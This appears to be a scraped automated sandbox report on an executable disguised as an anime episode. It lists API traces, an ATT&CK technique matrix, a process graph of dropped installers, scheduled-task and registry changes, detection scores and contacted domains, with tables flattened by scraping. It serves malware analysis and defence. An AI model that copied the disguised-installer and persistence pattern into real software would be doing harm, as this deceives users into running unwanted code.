Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0005393B AllocateAndInitializeSid,CheckTokenMembership,4_2_0005393B
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeQueries volume information: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\logo.png VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Windows\System32\vcruntime140.dll VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Windows\System32\msvcp140.dll VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\logo.png VolumeInformation
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeQueries volume information: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\logo.png VolumeInformation
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeQueries volume information: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\logo.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E9A7 cpuid 4_2_0003E9A7
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00024CE8 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,4_2_00024CE8
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FDC2 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,4_2_0004FDC2
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00058733 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,4_2_00058733
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0001508D GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,4_2_0001508D
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000160BA GetUserNameW,GetLastError,4_2_000160BA

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		1
Scripting		1
DLL Side-Loading		1
DLL Side-Loading		11
Deobfuscate/Decode Files or Information		OS Credential Dumping12
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium2
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Native API		1
DLL Search Order Hijacking		1
DLL Search Order Hijacking		1
Scripting		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts213
Command and Scripting Interpreter		2
Windows Service		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		2
Windows Service		1
Timestomp		NTDS3
File and Directory Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts1
Service Execution		Network Logon Script12
Process Injection		1
DLL Side-Loading		LSA Secrets36
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.common1
Scheduled Task/Job		1
DLL Search Order Hijacking		Cached Domain Credentials21
Security Software Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
File Deletion		DCSync11
Process Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job23
Masquerading		Proc Filesystem3
System Owner/User Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Modify Registry		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
Access Token Manipulation		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron12
Process Injection		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 776910 Sample: Boku no Hero Academia 6th S... Startdate: 02/01/2023 Architecture: WINDOWS Score: 26 125 www3.l.google.com 2->125 127 www.google.com 2->127 129 13 other IPs or domains 2->129 135 Obfuscated command line found 2->135 15 Boku no Hero Academia 6th Season - Episode 13.exe 2 2->15         started        19 msiexec.exe 122 2->19         started        21 InstallExtension.exe 2->21         started        23 VC_redist.x64.exe 2->23         started        signatures3 process4 file5 107 Boku no Hero Acade...on - Episode 13.tmp, PE32 15->107 dropped 131 Obfuscated command line found 15->131 25 Boku no Hero Academia 6th Season - Episode 13.tmp 3 13 15->25         started        109 C:\Windows\System32\vcruntime140_1.dll, PE32+ 19->109 dropped 111 C:\Windows\System32\vcruntime140.dll, PE32+ 19->111 dropped 113 C:\Windows\System32\vcomp140.dll, PE32+ 19->113 dropped 115 45 other files (none is malicious) 19->115 dropped 28 cmd.exe 21->28         started        31 VC_redist.x64.exe 23->31         started        signatures6 process7 file8 103 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 25->103 dropped 33 Boku no Hero Academia 6th Season - Episode 13.exe 2 25->33         started        137 Uses cmd line tools excessively to alter registry or file data 28->137 37 conhost.exe 28->37         started        39 reg.exe 28->39         started        41 reg.exe 28->41         started        45 4 other processes 28->45 43 VC_redist.x64.exe 31->43         started        signatures9 process10 file11 93 Boku no Hero Acade...on - Episode 13.tmp, PE32 33->93 dropped 133 Obfuscated command line found 33->133 47 Boku no Hero Academia 6th Season - Episode 13.tmp 5 33 33->47         started        95 C:\Users\user\AppData\Local\...\wixstdba.dll, PE32 43->95 dropped 50 VC_redist.x64.exe 43->50         started        signatures12 process13 file14 117 C:\Users\user\AppData\Local\...\is-NDGJF.tmp, PE32+ 47->117 dropped 119 C:\Users\user\...\InstallExtension.exe (copy), PE32+ 47->119 dropped 121 C:\Users\user\AppData\Local\...\is-DLQHQ.tmp, PE32 47->121 dropped 123 2 other files (none is malicious) 47->123 dropped 52 InstallExtension.exe 47->52         started        55 VC_redist.x64.exe 3 47->55         started        57 cmd.exe 47->57         started        59 VC_redist.x64.exe 50->59         started        process15 file16 99 C:\Users\user\AppData\Local\...\reg.xml, XML 52->99 dropped 61 cmd.exe 52->61         started        101 C:\Windows\Temp\...\VC_redist.x64.exe, PE32 55->101 dropped 64 VC_redist.x64.exe 71 55->64         started        67 conhost.exe 57->67         started        69 schtasks.exe 57->69         started        71 VC_redist.x64.exe 59->71         started        process17 file18 139 Uses cmd line tools excessively to alter registry or file data 61->139 141 Uses schtasks.exe or at.exe to add and modify task schedules 61->141 73 conhost.exe 61->73         started        75 schtasks.exe 61->75         started        87 C:\Windows\Temp\...\VC_redist.x64.exe, PE32 64->87 dropped 89 C:\Windows\Temp\...\wixstdba.dll, PE32 64->89 dropped 77 VC_redist.x64.exe 30 18 64->77         started        91 C:\Windows\Temp\...\wixstdba.dll, PE32 71->91 dropped signatures19 process20 file21 105 C:\ProgramData\...\VC_redist.x64.exe, PE32 77->105 dropped 80 VC_redist.x64.exe 77->80         started        process22 process23 82 VC_redist.x64.exe 80->82         started        file24 97 C:\Windows\Temp\...\wixstdba.dll, PE32 82->97 dropped 85 VC_redist.x64.exe 82->85         started        process25

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Boku no Hero Academia 6th Season - Episode 13.exe4%ReversingLabs
Boku no Hero Academia 6th Season - Episode 13.exe5%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
3cd707.rbf (copy)0%ReversingLabs
3cd708.rbf (copy)0%ReversingLabs
3cd709.rbf (copy)0%ReversingLabs
3cd70a.rbf (copy)0%ReversingLabs
3cd70b.rbf (copy)0%ReversingLabs
3cd70d.rbf (copy)0%ReversingLabs
3cd70e.rbf (copy)0%ReversingLabs
3cd70f.rbf (copy)0%ReversingLabs
3cd710.rbf (copy)0%ReversingLabs
3cd717.rbf (copy)0%ReversingLabs
3cd718.rbf (copy)0%ReversingLabs
3cd719.rbf (copy)0%ReversingLabs
3cd71a.rbf (copy)0%ReversingLabs
3cd71b.rbf (copy)0%ReversingLabs
3cd71c.rbf (copy)0%ReversingLabs
3cd71d.rbf (copy)0%ReversingLabs
3cd71e.rbf (copy)0%ReversingLabs
3cd71f.rbf (copy)0%ReversingLabs
3cd720.rbf (copy)0%ReversingLabs
3cd721.rbf (copy)0%ReversingLabs
3cd722.rbf (copy)0%ReversingLabs
3cd723.rbf (copy)0%ReversingLabs
3cd724.rbf (copy)0%ReversingLabs
C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\is-DLQHQ.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\wixstdba.dll0%ReversingLabs
C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Local\WindowsApp\is-NDGJF.tmp0%ReversingLabs
C:\Windows\System32\concrt140.dll0%ReversingLabs
C:\Windows\System32\mfc140.dll0%ReversingLabs
C:\Windows\System32\mfc140chs.dll0%ReversingLabs
C:\Windows\System32\mfc140cht.dll0%ReversingLabs
C:\Windows\System32\mfc140deu.dll0%ReversingLabs
C:\Windows\System32\mfc140enu.dll0%ReversingLabs
C:\Windows\System32\mfc140esn.dll0%ReversingLabs
C:\Windows\System32\mfc140fra.dll0%ReversingLabs
C:\Windows\System32\mfc140ita.dll0%ReversingLabs
C:\Windows\System32\mfc140jpn.dll0%ReversingLabs
C:\Windows\System32\mfc140kor.dll0%ReversingLabs
C:\Windows\System32\mfc140rus.dll0%ReversingLabs
C:\Windows\System32\mfc140u.dll0%ReversingLabs
C:\Windows\System32\mfcm140.dll0%ReversingLabs
C:\Windows\System32\mfcm140u.dll0%ReversingLabs
C:\Windows\System32\msvcp140.dll0%ReversingLabs
C:\Windows\System32\msvcp140_1.dll0%ReversingLabs
C:\Windows\System32\msvcp140_2.dll0%ReversingLabs
C:\Windows\System32\msvcp140_atomic_wait.dll0%ReversingLabs
C:\Windows\System32\msvcp140_codecvt_ids.dll0%ReversingLabs
C:\Windows\System32\vcamp140.dll0%ReversingLabs
C:\Windows\System32\vccorlib140.dll0%ReversingLabs
C:\Windows\System32\vcomp140.dll0%ReversingLabs
C:\Windows\System32\vcruntime140.dll0%ReversingLabs
C:\Windows\System32\vcruntime140_1.dll0%ReversingLabs
C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe0%ReversingLabs
C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\wixstdba.dll0%ReversingLabs
C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\wixstdba.dll0%ReversingLabs
C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe0%ReversingLabs
C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\wixstdba.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.3.Boku no Hero Academia 6th Season - Episode 13.tmp.4ea0000.0.unpack100%AviraHEUR/AGEN.1252364Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://smashbrowser.com/welcome2.phplW70%Avira URL Cloudsafe
http://ocsps.ssl.com00%URL Reputationsafe
https://smashbrowser.com/welcome2.phpl0%Avira URL Cloudsafe
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor0%URL Reputationsafe
https://smashbrowser.com/welcome2.php:0%Avira URL Cloudsafe
https://www.remobjects.com/ps0%URL Reputationsafe
https://www.innosetup.com/0%URL Reputationsafe
https://smash.com0%Avira URL Cloudsafe
https://smashbrowser.com0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php20%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php80%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpwEI0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpb0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpv70%Avira URL Cloudsafe
http://appsyndication.org/2006/appsyn0%URL Reputationsafe
https://smash.comiR0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpJ60%Avira URL Cloudsafe
https://smash.com1RO0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php(0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpVH0%Avira URL Cloudsafe
https://smash.comiRO0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpC:0%Avira URL Cloudsafe
https://smash.com1R0%Avira URL Cloudsafe
https://smashbrowser.com;40%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpA0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpR0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php~6s0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpoft0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php=0%Avira URL Cloudsafe
https://smash.com20%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpeewi0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
smashbrowser.com
188.114.97.3
truefalse
    		unknown
    46-105-201-240.any.cdn.anycast.me
    		46.105.201.240
    		truefalse
      		unknown
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		high
        accounts.google.com
        		172.217.168.45
        		truefalse
          		high
          www3.l.google.com
          		142.250.203.110
          		truefalse
            		high
            s4.histats.com
            		149.56.240.132
            		truefalse
              		high
              www.google.com
              		142.250.203.100
              		truefalse
                		high
                clients.l.google.com
                		142.250.203.110
                		truefalse
                  		high
                  offersss.click
                  		38.128.66.115
                  		truefalse
                    		unknown
                    offerszzzz.click
                    		38.128.66.115
                    		truefalse
                      		unknown
                      exturl.com
                      		38.128.66.115
                      		truefalse
                        		unknown
                        clients2.google.com
                        		unknown
                        		unknownfalse
                          		high
                          chrome.google.com
                          		unknown
                          		unknownfalse
                            		high
                            s10.histats.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://smashbrowser.com/welcome3.phpfalse
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://smashbrowser.com/welcome2.phplW7Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUBoku no Hero Academia 6th Season - Episode 13.exefalse
                                  		high
                                  https://smashbrowser.com/welcome2.php2Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://smashbrowser.com/welcome2.phplBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://wixtoolset.org/schemas/thmutil/2010VC_redist.x64.exe, 0000001C.00000003.364850644.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, VC_redist.x64.exe, 0000001C.00000003.365160612.0000000003390000.00000004.00000020.00020000.00000000.sdmp, thm.xml.20.dr, thm.xml.18.drfalse
                                    		high
                                    https://smashbrowser.com/welcome2.php:Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://smash.comBoku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.250432231.0000000003500000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000002.00000003.410317140.0000000002304000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://smashbrowser.comBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407001467.00000000024E6000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://smashbrowser.com/welcome2.php8Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409374574.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://smashbrowser.com/welcome2.phpv7Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://wixtoolset.org/schemas/thmutil/2010leVC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://smashbrowser.com/welcome2.phpbBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://smashbrowser.com/welcome2.phpwEIBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409410186.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsps.ssl.com0Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://smash.comiRBoku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://smashbrowser.com/welcome2.phpJ6Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgorVC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drfalse
                                        		high
                                        https://smash.com1ROBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drfalse
                                          		high
                                          https://smashbrowser.com/welcome2.php(Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://smash.com1RBoku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://smash.comiROBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://smashbrowser.com/welcome2.phpVHBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409391670.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drfalse
                                            		high
                                            https://smashbrowser.com/welcome2.phpC:Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409693542.0000000003920000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://smashbrowser.com/welcome2.phpRBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.remobjects.com/psBoku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://smashbrowser.com;4Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409029766.0000000000A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://www.innosetup.com/Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.ssl.com/repository0Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drfalse
                                              		high
                                              https://smashbrowser.com/welcome2.phpABoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407404878.00000000024ED000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://wixtoolset.org/schemas/thmutil/2010d=VC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
